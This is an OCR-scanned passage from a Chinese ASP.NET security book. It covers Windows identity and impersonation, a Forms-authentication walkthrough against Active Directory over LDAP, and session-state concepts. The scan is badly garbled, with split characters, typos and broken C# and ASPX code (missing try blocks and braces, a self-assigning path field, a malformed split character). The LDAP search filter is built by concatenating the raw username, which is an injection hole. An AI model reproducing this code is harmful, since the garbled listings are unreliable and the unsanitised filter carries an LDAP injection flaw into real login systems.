过 httpcontext.user 属性 访问 windowsprincipal 类 。 

要 启动 当前 请 求 的 安全 上 下 文 ， 使 用 以 下 代码 : 

using System.Security.Principal; 

// 获取 用 户 认证 身份 

WindowsPrincipal winPrincipal = (WindowsPrincipal)HttpContext.Current .User; 

windowsidentity.getcurrent; 

WindowsIdentity.GetCurrent 方法 用 于 获取 当前 运行 的 Win32 线程 安全 上 下 文 的 标识 。 
如 果 不 使 用 模拟 ， 线 程 继承 IS 6.0〈 默 认 情 况 下 的 NetworkService 账户 ) 进程 的 安全 上 
下 文 。 

安全 上 下 文 在 访问 本 地 资源 时 使 用 ， 通 过 使 用 初始 用 户 的 安全 上 下 文 或 固定 标识 ， 可 
以 使 用 模拟 重 写 该 安全 上 下 文 。 

要 检索 运行 在 应 用 程序 的 安全 上 下 文 ， 使 用 以 下 代码 : 

using System.Security.Principal; 

Nein the authenticated user's identity. 

WindowsIdentity winId = WindowsIdentity.GetCurrent (); 


WindowsPrincipal winPrincipal = new WindowsPrincipal (winId); 
thread.currentprincipal 


ASP.NET 应 用 程序 中 的 每 个 线程 公开 一 个 currentprincipal 对 象 ， 该 对 象 保存 经 过 身份 
验证 的 初始 用 户 的 安全 上 下 文 。 该 安全 上 下 文 可 用 于 基于 角色 的 授权 。 
要 检索 线程 的 当前 原则 ， 使 用 以 下 代码 : 


using System.Security.Principal; 
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// 获 取 用 户 认证 权限 
WindowsPrincipal winPrincipal = (WindowsPrincipal) Thread. 
CurrentPrincipal (); 


表 8-2 显示 从 各 种 标识 属性 获得 的 结果 标识 , 当 应 用 程序 使 用 Windows 身份 验证 且 IIS 
配置 为 使 用 集成 Windows 身份 验证 时 ， 则 可 以 在 ASP.NET 应 用 程序 使 用 这 些 标 识 属性 。 
表 8-2 ”主要 的 处 理 程序 
web.config 设置 变量 位 置 结果 标识 


<identity impersonate="true"/> HttpContext 
<authentication mode="Windows" /> | WindowsIdentity 线程 

















Domain\UserName 





<identity impersonate="false"/> HttpContext Domain\UserName 
<authentication mode="Windows" /> | WindowsIdentity 线程 | NT AUTHORITYWNETWORK SERVICE 


用 户 提供 的 名 称 
<authentication mode="Forms" /> WindowsIdentity 线程 | Domain\UserName 
<identity impersonate="false"/> HttpContext 用 户 提供 的 名 称 
<authentication mode="Forms" /> NT AUTHORITY\NETWORK SERVICE 

ASP.NET 应 用 程序 可 以 使 用 “模拟 模式 ”执行 操作 使 用 经 过 身份 验证 的 客户 端 或 特定 
Windows 账户 的 安全 上 下 文 来 访问 资源 。 要 模拟 初始 (经 过 身份 验证 的 ) 用 户 ， 必 须 在 
web.config 文件 中 使 用 以 下 代码 配置 : 

<authentication mode="Windows" /> 

<identity impersonate="true" /> 

通过 使 用 该 配置 ， ASP.NET 始终 模拟 经 过 身份 验证 的 用 户 ， 且 所 有 资源 访问 均 使 用 经 
过 身份 验证 的 用 户 的 安全 上 下 文 执行 。 如 果 应 用 程序 的 虚拟 目录 上 启用 了 匿名 访问 ， 则 模 
拟 IUSR_MACHINENAME 账户 。 

如 果 要 和 暂时 模拟 经 过 身份 验证 的 调用 方 ， 要 将 identity 元 素 的 impersonate 属性 设置 为 
false。 下 面 的 实例 代码 告诉 读者 如 何 获 取 用 户 身份 ， 并且 通过 方法 Impersonate 设置 客户 端 
的 模拟 属性 。 

客户 端 模拟 验证 代码 如 下 : 

using System.Security.Principal; 

// 获取 身份 

WindowsIdentity winId = (WindowsIdentity)HttpContext.Current.User.Identity; 

WindowsImpersonationContext ctx = null; 


EE 





<identity impersonate="true"/> 


// 开始 模拟 
ctx = winId.Impersonate(); 
// Now impersonating. 


// 授权 访问 资源 
} 
// 捕获 错误 


catch 
{ 
finally 


* 
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// Revert impersonation. 
1 ‘(ctx = null) 
ctx.Undo(); 
} 
// 返回 默认 进程 
这 段 代 码 模 拟 了 经 过 身份 验证 的 初始 用 户 , 在 httpcontext.current.user.identity 对 象 中 维 
护 初始 用 户 的 标识 和 Windows 令 牌 。 
如 果 需 要 在 应 用 程序 的 整个 生命 周期 中 模拟 相同 的 标识 ， 可 以 在 web.config 文件 中 的 
identity 元 素 上 指定 凭据 。 


8.4.2 ”基于 活动 目录 的 Windows 身份 验证 


本 节 介 绍 ASP.NET 应 用 程序 是 如 何 使 用 Forms 身份 验证 来 允许 用 户 使 用 轻型 目录 访 
问 协 议 (LDAP) 对 活动 目录 (Active Directory) 进行 身份 验证 的 。 在 对 用 户 进行 身份 验证 
和 重 定 向 后 ， 一 般 使 用 Global.asax 文件 的 Application AuthenticateRequest 方法 在 
HttpContext.User 属性 中 存储 GenericPrincipal 对 象 〈 该 对 象 贯 穿 整 个 请 求 ) 。 具 体操 作 步 
骤 如 下 : 

1. 创建 新 的 ASP.NET Web 应 用 程序 


(1) 启动 Microsoft Visual Studio NET。 

(2) 在 “文件 ”菜单 上 、 单 击 “ 新 建 ”按钮 ， 然 后 选择 “项 目 ” 项 。 

(3) 在 “项 目 类 型 ”下 ， 单 击 “Visual C# 项 目 ” 的 选项 卡 ， 然 后 在 “模板 ” 窗 体 中 选 
择 “ASP.NET Web 应 用 程序 ”的 图 标 。 

(4) 在 “名 称 ” 框 中 ， 输 入 FormsAuthAd。 

(5) 如 果 读 者 使 用 的 是 本 地 服务 器 ， 则 在 “服务 器 ” 框 中 保留 默认 的 http://localhost。 
和 否则， 添加 指向 您 所 用 服务 器 的 路 径 。 单 击 “ 确 定 ” 按 钮 。 

(6) 在 “解决 方案 资源 管理 器 ”中 ， 右 击 “ 引 用 ”节点 ， 然 后 在 弹出 的 快捷 菜单 中 单 
击 “ 添 加 引用 ”命令 。 

(7) 在 “添加 引用 ”对 话 框 中 的 .NET 选项 卡 上 , 依次 单 击 System.DirectoryServices.dll、 
“选择 ”和 “确定 ”按钮 。 

2. 添加 System.DirectoryServices 身 份 验证 代码 


(1) 在 “解决 方案 资源 管理 器 ”中 ， 右 击 项 目 节点 ， 指 向 “添加 ”项 ， 然 后 单 击 “ 添 
加 新 项 ”项 。 

(2) 在 “模板 ”下 ， 单 击 “ 类 ”项 。 

(3) 在 “名 称 ” 框 中 输入 LdapAuthentication.cs， 然 后 单 击 “ 打 开 ” 按 钮 。 

(4) 用 下 面 的 代码 替换 LdapAuthentication.cs 文件 中 的 现 有 代码 : 


using System; 

using System.Text; 

using System.Collections; 

using System.DirectoryServices; 





a 
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namespace FormsAuth 
! 
public class LdapAuthentication 
4 
private string path; 
private string filterAttribute; 
public LdapAuthentication(string path) 
{ 
path = path; 
} 


public bool IsAuthenticated (string domain, string username, string pwd) 
{ 
string domainAndUsername = domain + @"\" + username; 
DirectoryEntry entry = new DirectoryEntry( path, domainAndUsername, pwd); 
try 


{ 
// 绑 定 本 地 对 象 到 活动 目录 
object obj = entry.NativeObject; 
DirectorySearcher search = new DirectorySearcher (entry); 
search.Filter = "(SAMAccountName=" + username + ") "7 
search.PropertiesToLoad.Add ("cn"); 
SearchResult result = search.FindOne(); 
if(null == result) 
{ 
return false; 
} 
// Update the new path to the user in the directory. 
path = result.Path; 
filterAttribute = (string)result.Properties["cn"] [0]; 
} 
catch (Exception ex) 
{ 
throw new Exception("Error authenticating user. " + ex.Message); 
} 
return true; 


public string GetGroups () 
{ 
DirectorySearcher search = new DirectorySearcher( path); 
search.Filter = "(cn=" + filterAttribute + ")"; 
search.PropertiesToLoad.Add ("memberOf"); 
StringBuilder groupNames = new StringBuilder(); 
Ee 
{ 
SearchResult result = search.FindOne(); 
int propertyCount = result.Properties["memberOf"] .Count; 
string dn; 
int equalsIndex, commaIndex; 
for (int propertyCounter = 0; propertyCounter < propertyCount; 
propertyCounter++) 
| 
dn = (string)result.Properties["memberOf"] [propertyCounter]; 
equalsIndex = dn.IndexOf ("=", 1); 
CommaIndex = dn.IndexOf (",", 1); 
if(-1 == equalsIndex) 
{ 
return null; 
} 
groupNames .Append (dn.Substring( (equalsIndex + 1), (commaIndex — 
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equalsIndex) — 1)); 
groupNames .Append ("1"); 


| 
catch (Exception ex) 
{ 
throw new Exception("Error obtaining group names. " + ex.Message); 
} 
return groupNames.ToString(); 
} 
} 
. 
上 述 过 程 中 ， 身 份 验证 代码 接受 域 、 用 户 名 、 密 码 和 指向 Active Directory 树 的 路 径 。 
此 代码 使 用 LDAP 目录 提供 程序 。 Logonaspx 页 中 的 代码 调用 
LdapAuthentication.IsAuthenticated 方法 并 传 入 从 该 用 户 收集 的 凭据 。 然 后 ， 创 建 一 个 
DirectoryEntry 对 象 ， 该 对 象 包含 指向 目录 树 的 路 径 、 用 户 名 和 密码 ， 用 户 名 必须 采用 
domainvusername 格式 。 
然后 DirectoryEntry 对 象 通过 获取 NativeObject 属性 ， 尝 试 强制 绑 定 AdsObject 对 象 。 
如 果 上 述 操 作成 功 ， 则 通过 创建 DirectorySearcher 对 象 并 用 sAMAccountNameadschema. 
a_samaccountname 进行 筛选 ， 获 取 用 户 的 CN 属性 。 
在 对 用 户 进行 身份 验证 后 ，IsAuthenticated 方法 返回 hue。 为 获取 用 户 组 的 列表 ， 此 代 
码 调用 LdapAuthentication.GetGroups 方法 。LdapAuthentication.GetGroups 方法 通过 创建 
DirectorySearcher 对 象 并 根据 memberOf 属性 进行 第 选 ， 获 取 用 户 所 属 的 安全 和 分 发 组 的 
列表 。 
此 方法 会 返回 由 竖 线 分 隔 的 组 列表 。 注意 LdapAuthentication.GetGroups 方法 会 对 字符 
串 进 行 截断 处 理 ， 将 缩短 在 身份 验证 Cookie 中 存储 的 字符 串 长 度 。 如 果 字 符 串 未 被 截断 ， 
则 每 组 的 格式 如 下 : 


CN=…，… ,DC=domain, DC=com 


LdapAuthentication.GetGroups 方法 可 能 返回 非常 长 的 字符 串 。 如 果 此 字符 串 的 长 度 大 
于 Cookie 的 长 度 ， 就 不 会 创建 身份 验证 Cookie。 如 果 此 字符 串 可 能 超出 Cookie 的 长 度 ， 
则 需要 在 ASP.NET 缓存 对 象 或 数据 库 中 存储 组 信息 。 或 可 能 需要 对 组 信息 进行 加 密 ， 并 
在 隐藏 的 窗 体 字段 中 存储 此 信息 。 

Globalasax 文件 的 代码 提供 Application_AuthenticateRequest 事件 处 理 程序 ， 此 事件 处 
理 程 序 从 Context.Request.Cookies 集合 检索 身份 验证 Cookie， 对 Cookie 进行 解密 ， 并 且 检 
索 在 FormsAuthenticationTicket UserData 属性 中 存储 的 组 列表 。 这 些 组 在 Logon.aspx 页 中 
创建 ， 用 竖 线 分 隔 的 列表 进行 展现 。 代 码 对 字符 串 数组 中 的 字符 串 进 行 分 析 ， 以 创建 
GenericPrincipal 对 象 。 在 创建 GenericPrincipal 对 象 后 ， 将 该 对 象 放置 于 HttpContext.User 
属性 中 。 


3. 编写 Global.asax 代 码 





(1) 在 “解决 方案 资源 管理 器 ”中 ， 右 击 Globalasax， 然 后 单 击 “ 查 看 代码 ”。 
(2) 将 以 下 代码 添加 到 theGlobal.asax.cs 文件 : 


using System.Web.Security; 


a 
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using System.Security.Principal; 


(3) 使 用 以 下 代码 替换 Application AuthenticateRequest 的 现 有 空 事件 处 理 程序 : 


void Application AuthenticateRequest (object sender, EventArgs e) 
string CookieName = FormsAuthentication.FormsCookieName; 
HttpCookie authCookie = Context.Request.Cookies[CookieName]; 


if(null == authCookie) 
{ 
// There is no authentication Cookie. 
return; 
} 
FormsAuthenticationTicket authTicket = null; 
tr 
{ 
authTicket = FormsAuthentication.Decrypt (authCookie.Value); 
} 
catch (Exception ex) 
{ 
// Write the exception to the Event Log. 
return; 
ll 
if(null == authTicket) 
{ 
// Cookie failed to decrypt. 
return; 
} 
// When the ticket was created, the UserData property was assigned a 
// pipe-delimited string of group names. 
string[] groups = authTicket.UserData.Split(new char[]{'|"'}); 
// Create an Identity. 
GenericIdentity id = new GenericIdentity (authTicket.Name， 
"LdapAuthentication"); 
// This principal flows throughout the request. 
GenericPrincipal principal = new GenericPrincipal (id, groups); 
Context.User = principal; 


:本 节 中 将 配置 web.config 文件 中 的 <forms>、<authentication> 和 <authorization> 元 素 。 
些 更 改 ， 只 有 经 过 了 身份 验证 的 用 户 才 能 访问 该 应 用 程序 ， 未 经 身份 验证 的 请 求 被 
重 定向 到 Logon.aspx 页 。 程 序 员 可 以 修改 此 配置 ， 只 允许 某 些 用 户 和 组 访问 该 应 用 程序 。 


4. 修改 web.config 文 件 





(1) 在 记事 本 中 打开 web.config。 
(2) 用 下 面 的 代码 替换 现 有 代码 : 


<?xml] version="1.0" encoding="utf-8"?> 
<configuration> 
<system.web> 
<authentication mode="Forms"> 
<forms loginUrl="logon.aspx" name="adAuthCookie" timeout="10" 
path="/"> 
</forms> 
</authentication> 
<authorization> 
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<deny users="?"/> 
<allow users="*"/> 
</authorization> 
<identity impersonate="true"/> 
</system.web> 
</configuration> 


注意 配置 元 素 : <identity impersonate="true"/>。 对 于 配置 来 自 Intemet 信息 服务 的 匿名 
账户 ， 上 述 元 素 确 保 了 ASP.NET 模拟 该 账户 。 此 配置 实现 了 对 此 应 用 程序 的 所 有 请 求 都 
基于 所 配置 的 账户 的 安全 上 下 文 运行 。 该 用 户 针对 Active Directory 进行 身份 验证 , 但 访问 
Active Directory 的 账户 必须 是 已 配置 的 账户 。 


5. 为 匿名 身份 验证 配置 |IS 


(1) 在 IIS 管理 器 (管理 工具 中 ) 或 用 于 IS 的 MMC 管理 单元 中 ， 右 击 要 为 其 配置 身 
份 验 证 的 网 站 ， 然 后 单 击 “ 属 性 ”命令 。 

(2) 单 击 “ 目 录 安 全 性 ”选项 卡 ， 然 后 在 “身份 验证 和 访问 控制 ”下 ， 单 击 “ 编 辑 ” 
按钮 。 

(3) 选 中 “匿名 身份 验证 ” 复 选 框 (在 Windows Server 2008 中 标记 了 “启用 匿名 访问 ”)。 

(4) 使 应 用 程序 的 匿名 账户 成 为 对 Active Directory 具有 权限 的 账户 。 

(5) 如 果 启 用 了 “人 允许 IIS 控制 密码 ” 复 选 框 ， 则 清除 该 复 选 框 。 默 认 的 
IUSR _<computername> 账 户 对 Active Directory 不 具有 权限 。 





6. 创建 Logon.aspx 测 试 页 


(1) 在 “解决 方案 资源 管理 器 ”中 ， 右 击 项 目 节点 ， 在 弹出 的 快捷 菜单 中 选择 “添加 ” 
一 “添加 Web 窗 体 ” 命 令 。 

(2) 在 “名 称 ” 框 中 输入 Logon.aspx， 然 后 单 击 “ 打 开 ” 按 钮 。 

(3) 在 “解决 方案 资源 管理 器 ” 中, 右 击 Logon.aspx 项 , 在 弹出 的 快捷 菜单 中 选择 “ 视 
图 设计 器 ”命令 。 

(4) 单 击 “ 设 计 器 ”中 的 HTML 选项 卡 。 

(5) 用 下 面 的 代码 蔡 换 现 有 代码 : 


<%@ Page language="c#" AutogventWireup="true" %> 
<%Q@ Import Namespace="FormsAuth" %> 
<html> 
<body> 
<form id="Login" method="post" runat="server"> 
<asp:Label ID="Labell" Runat=server >Domain:</asp:Label> 
<asp:TextBox ID="txtDomain" Runat=server ></asp:TextBox><br> 
<asp:Label ID="Label2" Runat=server >Username:</asp:Label> 
<asp:TextBox ID=txtUsername Runat=server ></asp:TextBox><br> 
<asp:Label ID="Label3" Runat=server >Password:</asp:Label> 
<asp:TextBox ID="txtPassword" Runat=server 
TextMode=Password></asp:TextBox><br> 
<asp:Button ID="btnLogin" Runat=server Text="Login" 
OnClick="Login Click"></asp:Button><br> 
<asp:Label ID="errorLabel" Runat=server ForeColor=#ff3300> 
</asp:Label><br> 
<asp:CheckBox ID=chkPersist Runat=server Text="Persist Cookie" /> 
</form> 
</body> 
</html> 


ee 
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<script runat=server> 


void 


Login Click(object sender, EventArgs e) 


string adPath = "LDAP://DC=..,DC=.."; //Path to your LDAP directory server 
LdapAuthentication adAuth = new LdapAuthentication (adPath); 


L 


{ 


if(true == adAuth.IsAuthenticated (txtDomain.Text, txtUsername.Text, 
txtPassword.Text)) 


: 


} 


string groups = adAuth.GetGroups (); 
// 创建 票据 和 组 
bool isCookiePersistent = chkPersist.Checked; 
FormsAuthenticationTicket authTicket = new FormsAuthentication-— 
Ticket (1, 

txtUsername.Text, DateTime.Now, DateTime.Now.AddMinutes (60),，, 
isCookiePersistent, groups); 
// 加 密 票据 
string encryptedTicket = FormsAuthentication.Encrypt (authTicket); 
//Create a Cookie, and then add the encrypted ticket to the Cookie as data. 
HttpCookie authCookie = new HttpCookie (FormsAuthentication. 
FormsCookieName, 
encryptedTicket); 
if(true == isCookiePersistent) 
authCookie .Expires = authTicket .Expiration; 
// 添加 Cookies. 
Response.Cookies.Add (authCookie); 
// 重 定向 
Response.Redirect (FormsAuthentication.GetRedirectUr] (txtUsernarme .Text， 
false)); 


else 


{ 


} 
} 


errorLabel .Text = "Authentication did not succeed. Check user name and 
Password."7 


catch (Exception ex) 


{ 


errorLabel.Text = "Error authenticating. " + ex.Message; 


| 


</script> 


(6) 修改 Logon.aspx 页 中 的 路 径 ， 以 指向 目标 LDAP 目录 服务 器 。 
Logon.aspx 页 用 于 收集 来 自用 户 的 信息 并 调用 LdapAuthentication 类 的 方法 。 在 代码 对 
用 户 进行 身份 验证 并 获取 了 组 列表 后 ， 创 建 一 个 FormsAuthenticationTicket 对 象 ， 对 票据 


进行 加 密 ， 








比 页 时 





最 后 将 请 求 





向 一 个 Cookie 添加 加 密 的 票据 ， 向 HttpResponse.Cookies 集合 添加 该 Cookie， 
定向 到 最 初 请 求 的 URL。WebForml.aspx 页 是 最 初 请 求 的 页 ， 在 用 户 请 求 
定向 到 Logon.aspx 页 。 在 对 请 求 进行 身份 验证 后 ， 该 请 求 被 重 定 向 到 








WebForml.aspx 页 。 


7. 修改 WebForm1.aspx 页 








(1) 在 “解决 方案 资源 管理 器 ”中 ， 右 击 WebForm1l.aspx 项 ， 然 后 在 弹出 的 快捷 菜单 











eh 


“视图 设计 器 ”命令 。 
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(2) 切换 至 “设计 器 ”中 的 HTML 选项 卡 。 
(3) 用 下 面 的 代码 替换 现 有 代码 : 


<%$@ Page language="c#" AutoEventWireup="true" 各 > 
<%$@ Import Namespace="System.Security.Principal" $%> 
<htm1> 
<body> 
<form id="Forml" method="post" runat="server"> 
<asp:Label ID="lblName" Runat=server /><br> 
<asp:Label ID="lblAuthType" Runat=server /> 
</form> 
</body> 
</html> 
<script runat=server> 
void Page Load(object sender, EventArgs e) 


{ 





lblName.Text = "Hello " + Context.User.Identity.Name + "."; 
lblAuthType.Text = "You were authenticated using " + Context.User. 
Identity.AuthenticationType + "."; 

3: 


</script> 

(4) 保存 所 有 文件 ， 然 后 编译 该 项 目 。 

(5) 请 求 WebForml.aspx 页 面 。 请 注意 ， 该 页 面 会 重 定向 到 Logon.aspx。 

(6) 输入 登录 票据 ， 然 后 单 击 “ 提 交 ” 按 钮 。 系 统 重 定向 到 WebForml.aspx 后 ， 请 注 
意 用 户 名 将 出 现 并 且 LdapAuthentication 用 于 Context.User.AuthenticationType 属性 的 身份 
验证 类 型 。 








a 
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本 章 讲 述 关 于 安全 会 话 的 相关 概念 ， 告 诉 读者 如 何 保护 会 话 以 及 加 固 现 有 的 状态 数 
据 。 这 些 安全 加 固 技术 非常 重要 ， 将 减少 软件 系统 特别 是 Web 系统 被 黑客 攻击 的 机 会 ， 防 
止 客户 与 服务 器 建立 的 私密 会 话 被 黑客 截取 和 探查 。 





9.1 Session 的 概念 


Session 中 文 叫 “会话 ”。 会 话 的 产生 来 源 于 服务 的 简化 ， 在 每 个 系统 功能 中 都 对 用 户 
的 标识 和 访问 权限 进行 验证 是 非常 单调 而 烦琐 的 。 为 了 跟踪 记录 正在 使 用 功能 的 用 户 以 及 
该 用 户 对 应 的 访问 权限 ， 系 统 在 用 户 成 功 登 录 后 会 为 该 用 户 建立 一 个 安全 会 话 。 

系统 通过 提供 一 个 对 安全 会 话 对 象 合法 的 引用 ， 就 不 再 传递 访问 权限 或 是 对 用 户 重 复 
不 停 的 验证 。 对 用 户 安 全 属性 的 查询 可 以 通过 使 用 会 话 引用 访问 相应 的 会 话 对 象 来 完成 。 

下 面 将 逐一 介绍 创建 安全 会 话 必 备 的 要 素 : 


1. 会 话 变量 


会 话 变量 存储 在 SessionStateItemCollection 对 象 中 ,通过 HttpContext.Session 属性 公开 。 
在 ASPNET 页 面 中 ， 当 前 会 话 变量 通过 Page 对 象 的 Session 属性 公开 。 

会 话 变量 集合 的 索引 按 变 量 名 称 或 整数 索引 进行 ， 可 以 通过 名 称 引 用 创建 会 话 变量 ， 
而 无 需 声明 或 显 式 添加 到 集合 中 。 下 面 的 示例 演示 如 何在 ASPNET 页 上 创建 分 别 表示 用 
户 名 字 和 姓氏 的 会 话 变量 ， 并 将 它们 设置 为 从 TextBox 控件 检索 。 

用 C# 代 码 创建 一 个 会 话 变量 的 代码 如 下 : 

Session["FirstName"] = FirstNameTextBox.Text; 

Session["LastName"] = LastNameTextBox.Text; 


会 话 变 量 可 以 是 任何 有 效 的 .NET 框架 类 型 。 下 面 的 例子 是 将 ArrayList 对 象 存储 在 名 
为 StockPicks 的 会 话 变 量 中 。 当 从 SessionStateItemCollection 检索 由 StockPicks 会 话 变 量 返 
回 的 值 时 ， 必 须 将 此 值 强制 转换 为 适当 的 类 型 。 

// 转换 类 型 


ArrayList stockPicks = (ArrayList)Session["StockPicks"]; 


// 将 修改 的 数组 保存 到 会 话 


Session["StockPicks"] = stockPicks; 


全 注意 ; 当 使 用 InProc 以 外 的 会 话 状态 模式 时 ， 会 话 变量 类 型 必须 为 基 元 .NET 类 型 或 可 
序列 化 的 类 型 ， 这 是 因为 会 话 变量 值 存储 在 外 部 数据 存储 区 中 ， 更 多 信息 参见 会 
话 状态 模式 。 
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2. 会 话 标识 符 


会 话 由 一 个 唯一 标识 符 进行 标识 ， 使 用 SessionID 属性 读 取 此 标识 符 。 当 ASPNET 应 
用 程序 启用 会 话 状态 时 ， 将 检查 应 用 程序 中 每 个 页 面 请 求 是 否 有 浏览 器 发 送 的 SessionID 
值 .如 果 未 提供 任何 SessionID 值 , 则 ASPNET 将 启动 一 个 新 会 话 ,并 将 该 会 话 的 SessionID 
值 随 响应 发 送 到 浏览 器 。 

默认 情况 下 , SessionID 值 存储 在 Cookie 中 ,但 也 可 以 将 应 用 程序 配置 为 在 “无 Cookie” 
会 话 的 URL 中 存储 。 

只 要 一 直 是 相同 的 SessionID 值 来 发 送 请 求 ， 会 话 就 被 视 为 活动 的 。 如 果 特 定 会 话 的 
请 求 间隔 超过 指定 的 最 大 值 〈 以 分 钟 为 单位 ) ， 该 会 话 被 视 为 过 期 。 使 用 过 期 的 SessionID 
值 发 送 的 请 求 将 生成 一 个 新 的 会 话 。 

SessionID 使 ASP.NET 应 用 程序 能 够 将 特定 的 浏览 器 与 Web 服务 器 上 相关 的 会 话 数据 
和 信息 相关 联 。 会话 ID 的 值 在 浏览 器 和 Web 服务 器 间 通 过 Cookie 进行 传输 ， 如 果 指 定 了 
无 Cookie 会 话 ， 则 通过 URL 进行 传输 。 


3. 安全 说 明 

















无 论 是 作为 Cookie 还 是 作为 URL 的 一 部 分 ,System.Web.SessionState.HttpSessionState. 
SessionID 值 都 以 明文 的 形式 发 送 。 恶 意 用 户 如 果 获取 了 SessionID 值 并 将 其 包含 在 对 服务 
器 的 请 求 中 ， 就 可 以 访问 另 一 位 用 户 的 会 话 。 如 果 将 敏感 信息 存储 在 会 话 状态 中 ， 则 应 该 
使 用 SSL 加 密 浏览 器 和 服务 器 之 间 包 含 SessionID 值 的 任何 通信 。 


4. 无 Cookie 的 SessionID 


默认 情况 下 , SessionID 值 存 储 在 浏览 器 的 会 话 Cookie 中 。 但 是 ,可 以 通过 在 web.config 
文件 的 sessionState 节 中 将 Cookieless 属性 设置 为 tue， 这 样 就 不 用 把 会 话 标识 符 存储 在 
Cookie 中 。 

下 面 的 实例 演示 了 一 个 web.config 文件 ， 将 ASP.NET 应 用 程序 配置 为 使 用 无 Cookie 
的 SessionID 值 。 


<configuration> 
<system.web> 
<sessionState cookieless="true" 
regenerateExpiredSessionId="true" /> 
</system.web> 
</configuration> 


如 果 要 保持 无 Cookie 会 话 状态 ， 应 该 在 页 的 URL 中 插入 唯一 的 会 话 ID。 例 如 ，URL 
可 被 ASPNET 修改 ， 以 包含 唯一 的 会 话 人 D。 

当 ASP.NET 向 浏览 器 发 送 页 面 时 , ASP.NET 将 修改 页 面 中 任何 使 用 相对 路 径 的 链接 ， 
在 链接 中 嵌入 一 个 会 话 ID 值 ( 不 修改 具有 绝对 路 径 的 链接 ) 。 只 要 用 户 单 击 已 按 这 种 方 
式 修改 的 链接 ， 即 可 保持 会 话 状 态 。 但 是 ， 如 果 客户 端 重新 写 入 应 用 程序 提供 的 URL， 
ASPNET 就 不 能 解析 此 会 话 ID， 也 不 能 将 请 求 与 现 有 的 会 话 相 关联 。 在 这 种 情况 下 ， 会 
为 请 求 启动 一 个 新 的 会 话 。 

会 话 JD 嵌入 在 URL 中 应 用 程序 名 称 斜 杠 之 后 ， 在 其 余 所 有 文件 或 虚拟 目录 标识 符 之 
前 。 这 使 ASP.NET 可 以 在 使 用 SessionStateModule 之 前 解析 应 用 程序 的 名 称 。 























人 
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全 注意 : 为 提高 应 用 程序 的 安全 性 ， 应 当 允 许 用 户 从 应 用 程序 注销 ， 此 时 应 用 程序 会 调用 
Abandon 方法 。 这 降低 了 恶意 用 户 获取 URL 中 的 唯一 标识 符 并 用 它 检索 存储 在 
会 话 中 的 用 户 私 人 数据 的 风险 。 


5. 重新 生成 已 过 期 的 会 话 标识 符 


默认 情况 下， 系统 会 回收 无 Cookie 会 话 中 使 用 的 SessionID 值 。 也 就 是 说 ， 如 果 使 用 
已 过 期 的 SessionID 发 起 一 个 请 求 , 将 会 启动 一 个 新 的 会 话 。 当 包含 无 Cookie SessionID 值 
的 链接 由 多 个 浏览 器 同时 使 用 时 ， 会 导致 无 意 中 共享 会 话 〈 通 过 搜索 引擎 、 电 子 邮 件 或 另 
一 个 程序 传递 链接 ， 就 会 发 生 这 种 情况 ) 。 

针对 这 种 情况 ， 可 以 通过 将 应 用 程序 配置 为 不 回收 会 话 标识 符 ， 减 少 共享 会 话 数 据 的 
机 会 。 为 此 需要 将 sessionState 配置 元 素 的 regenerateExpiredSessionId 属性 设置 为 tue。 这 
样 一 来 , 在 使 用 已 过 期 的 会 话 ID 发 起 无 Cookie 会 话 请 求 时 , 就 会 生成 一 个 新 的 SessionID 。 

如 果 HTTP POST 方法 调用 使 用 过 期 SessionID 发 起 的 请 求 ， 当 
regenerateExpiredSessionId 为 true 时 ， 将 丢失 发 送 的 所 有 数据 。 这 是 因为 ASP.NET 会 执行 
重 定向 ， 以 确保 浏览 器 在 URL 中 具有 新 的 会 话 标识 符 。 

6. 自 定义 会 话 标识 各 

实现 自 定义 类 来 提供 和 验证 SessionID 值 需要 创建 一 个 从 SessionIDManager 类 继承 的 
类 ， 并 自 定 义 实现 ， 重 写 CreateSessionID 和 Validate 方法 。 

通过 创建 实现 ISessionIDManager 接口 的 类 替换 SessionIDManager 类 进行 自 定义 
SessionID 管理 。 例 如 ， 通 过 使 用 ISAPI 筛选 器 ，Web 应 用 程序 可 能 将 唯一 标识 符 与 非 
ASPNET 页 面 ( 如 HTML 页 或 图 像 》 相 关联 。 可 以 实现 自 定义 的 SessionIDManager 类 ， 
将 此 唯一 标识 符 用 于 ASP.NET 会 话 状态 。 如 果 自 定义 类 支持 无 Cookie 会 话 标识 符 ， 则 必 
须 实现 一 个 解决 方案 ， 以 便 在 URL 中 发 送 和 检索 会 话 标识 符 。 


7. 会 话 模式 


ASP.NET 会 话 状态 支持 会 话 变量 的 一 些 存储 选项 。 每 个 选项 都 被 标识 为 一 个 会 话 状 态 
Mode 类 型 。 默 认 情况 下 将 会 话 变量 存储 在 ASPNET 辅助 进程 的 内 存 空 间 中 ， 不 过 也 可 以 
指定 将 会 话 状态 存储 在 单独 进程 、SQL Server 数据 库 或 是 自 定义 数据 源 中 。 如 果 不 希望 为 
应 用 程序 启用 会 话 状态 ， 可 以 将 会 话 模式 设置 为 Off。 

8. 会 话 事件 


ASP.NET 提 供 两 个 可 帮助 管理 用 户 会 话 的 事件 : Session OnStart 事 件 和 Session OnEnd 
事件 ， 前 者 在 开始 一 个 新 会 话 时 引发 ， 后 者 在 一 个 会 话 被 放弃 或 过 期 时 引发 。 会 话 事件 是 
在 ASP.NET 应 用 程序 的 Global.asax 文件 中 指定 的 。 

如 果 将 会 话 Mode 属性 设置 为 mProc (默认 模式 ) 以 外 的 值 ， 则 不 支持 Session OnEnd 
事件 。 

如 果 ASPNET 应 用 程序 的 Global.asax 文件 或 web.config 文件 被 修改 ， 将 导致 重新 启 





“2 


第 9 章 构建 可 靠 Session 





动 应 用 程序 ， 存 储 在 应 用 程序 状态 或 会 话 状态 中 的 值 都 将 丢失 。 


全 注意 : 某 些 防 病 毒 软件 可 能 会 更 新 应 用 程序 的 Global.asax 或 web.config 文件 的 最 后 修改 
日 期 和 时 间 。 


9. 配置 会 话 状态 


通过 使 用 system.web 配置 节 的 sessionState 元 素 可 配置 会 话 状态 。 还 可 以 通过 使 用 
@Page 指令 中 的 EnableSessionState 值 来 配置 会 话 状 态 。 

使 用 sessionState 元 素 可 指定 以 下 选项 : 

口 会 话 存储 数据 所 使 用 的 模式 。 

口 在 客户 端 和 服务 器 之 间 发 送 会 话 标识 符 值 的 方式 。 

口 会 话 的 Timeout 值 。 

口 支持 基于 会 话 Mode 设置 的 值 。 

下 面 的 实例 演示 了 一 个 sessionState 元 素 ， 该 元 素 用 来 配置 应 用 程序 的 SQL Server 会 
话 模式 ， 将 Timeout 值 设置 为 30 分 钟 ， 并 指定 将 会 话 标识 符 存储 在 URL 中 。 


<sessionState mode="SQL Server" 
cookieless="true " 
regenerateExpiredSessionId="true " 
timeout="30" 
